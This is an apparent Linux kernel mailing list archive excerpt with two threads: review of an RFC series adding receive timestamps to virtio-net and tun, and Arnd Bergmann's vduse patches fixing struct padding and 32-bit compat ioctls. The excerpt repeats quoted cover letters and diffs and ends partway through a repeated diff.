- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Steffen Trumtrar wrote:
Good to see this picked up. I would also still like to see support in
virtio-net for HW timestamps pass-through for virtio-net.
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:00:07 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Steffen Trumtrar wrote:
This patch refers to a struct that does not exist yet, so this cannot
compile?
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:00:49 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Steffen Trumtrar wrote:
Jason, Michael: creating a new struct for every field is not very
elegant. Is it time to find a more forward looking approach to
expanding with new fields? Like a TLV, or how netlink structs like
tcp_info are extended with support for legacy users that only use
a truncated struct?
It's fine to implement filters, but also fine to only support ALL or
NONE for simplicity.
In the end it probably depends on what the underlying physical device
supports.
Why the multiple fields, rather than u64.
More broadly: can my old patchset be dusted off as is. Does it require
significant changes?
I only paused it at the time, because I did not have a real device
back-end that was going to support it.
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Sun, 01 Feb 2026 16:05:54 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote:
Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that.
Should have added a comment, but this is based on this patch
c3838262b824c71c145cd3668722e99a69bc9cd9
virtio_net: fix alignment for virtio_net_hdr_v1_hash
Changing alignment of header would mean it's no longer safe to cast a
2 byte aligned pointer between formats. Use two 16 bit fields to make
it 2 byte aligned as previously.
This is the dusted off version ;) With the flow filter it should be possible to turn the timestamps on and off during runtime.
Best regards,
Steffen
--
Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar |
Steuerwalder Str. 21 | https://www.pengutronix.de/ |
31137 Hildesheim, Germany | Phone: +49-5121-206917-0 |
Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Mon, 02 Feb 2026 08:34:58 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote:
I certainly wouldn't mind, though I suspect tlv is too complex as
hardware implementations can't efficiently follow linked lists. I'll
try to ping some hardware designers for what works well for offloads.
|
{
"author": "\"Michael S. Tsirkin\" <mst@redhat.com>",
"date": "Mon, 2 Feb 2026 02:59:31 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Michael S. Tsirkin wrote:
Great thanks.
Agreed that TLV was probably the wrong suggestion.
We can definitely have a required order of fields. My initial thought
is as said like many user/kernel structures: where both sides agree on
the basic order of the struct, and pass along the length, so that they
agree only to process the min of both their supported lengths. New
fields are added at the tail of the struct. See for instance getsockopt
TCP_INFO.
|
{
"author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>",
"date": "Mon, 02 Feb 2026 12:40:36 -0500",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
From: Arnd Bergmann <arnd@arndb.de>
These two ioctls are incompatible on 32-bit x86 userspace, because
the data structures are shorter than they are on 64-bit.
Add compad handling to the regular ioctl handler to just handle
them the same way and ignore the extra padding. This could be
done in a separate .compat_ioctl handler, but the main one already
handles two versions of VDUSE_IOTLB_GET_FD, so adding a third one
fits in rather well.
Fixes: ad146355bfad ("vduse: Support querying information of IOVA regions")
Fixes: c8a6153b6c59 ("vduse: Introduce VDUSE - vDPA Device in Userspace")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 43 +++++++++++++++++++++++++++---
1 file changed, 40 insertions(+), 3 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 405d59610f76..39cbff2f379d 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1341,6 +1341,37 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
return r;
}
+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+/*
+ * i386 has different alignment constraints than x86_64,
+ * so there are only 3 bytes of padding instead of 7.
+ */
+struct compat_vduse_iotlb_entry {
+ compat_u64 offset;
+ compat_u64 start;
+ compat_u64 last;
+ __u8 perm;
+ __u8 padding[__alignof__(compat_u64) - 1];
+};
+#define COMPAT_VDUSE_IOTLB_GET_FD _IOWR(VDUSE_BASE, 0x10, struct compat_vduse_iotlb_entry)
+
+struct compat_vduse_vq_info {
+ __u32 index;
+ __u32 num;
+ compat_u64 desc_addr;
+ compat_u64 driver_addr;
+ compat_u64 device_addr;
+ union {
+ struct vduse_vq_state_split split;
+ struct vduse_vq_state_packed packed;
+ };
+ __u8 ready;
+ __u8 padding[__alignof__(compat_u64) - 1];
+} __uapi_arch_align;
+#define COMPAT_VDUSE_VQ_GET_INFO _IOWR(VDUSE_BASE, 0x15, struct compat_vduse_vq_info)
+
+#endif
+
static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
unsigned long arg)
{
@@ -1352,6 +1383,9 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
return -EPERM;
switch (cmd) {
+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+ case COMPAT_VDUSE_IOTLB_GET_FD:
+#endif
case VDUSE_IOTLB_GET_FD:
case VDUSE_IOTLB_GET_FD2: {
struct vduse_iotlb_entry_v2 entry = {0};
@@ -1455,13 +1489,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
ret = 0;
break;
}
+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+ case COMPAT_VDUSE_VQ_GET_INFO:
+#endif
case VDUSE_VQ_GET_INFO: {
- struct vduse_vq_info vq_info;
+ struct vduse_vq_info vq_info = {};
struct vduse_virtqueue *vq;
u32 index;
ret = -EFAULT;
- if (copy_from_user(&vq_info, argp, sizeof(vq_info)))
+ if (copy_from_user(&vq_info, argp, _IOC_SIZE(cmd)))
break;
ret = -EINVAL;
@@ -1491,7 +1528,7 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
vq_info.ready = vq->ready;
ret = -EFAULT;
- if (copy_to_user(argp, &vq_info, sizeof(vq_info)))
+ if (copy_to_user(argp, &vq_info, _IOC_SIZE(cmd)))
break;
ret = 0;
--
2.39.5
|
{
"author": "Arnd Bergmann <arnd@kernel.org>",
"date": "Mon, 2 Feb 2026 10:59:32 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026 at 11:06 AM Arnd Bergmann <arnd@kernel.org> wrote:
s/indiviudally/individually/ if v2
That's something I didn't take into account, thanks!
I did not know about _IOC_SIZE and I like how it reduces the complexity, thanks!
As a proposal, maybe we can add MIN(_IOC_SIZE, sizeof(entry)) ? Not
sure if it is too much boilerplate for nothing as the compiler should
make the code identical and the uapi ioctl part should never change.
But it seems to me future changes to the code are better tied with the
MIN.
I'm ok with not including MIN() either way.
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:28:26 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members indiviudally, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
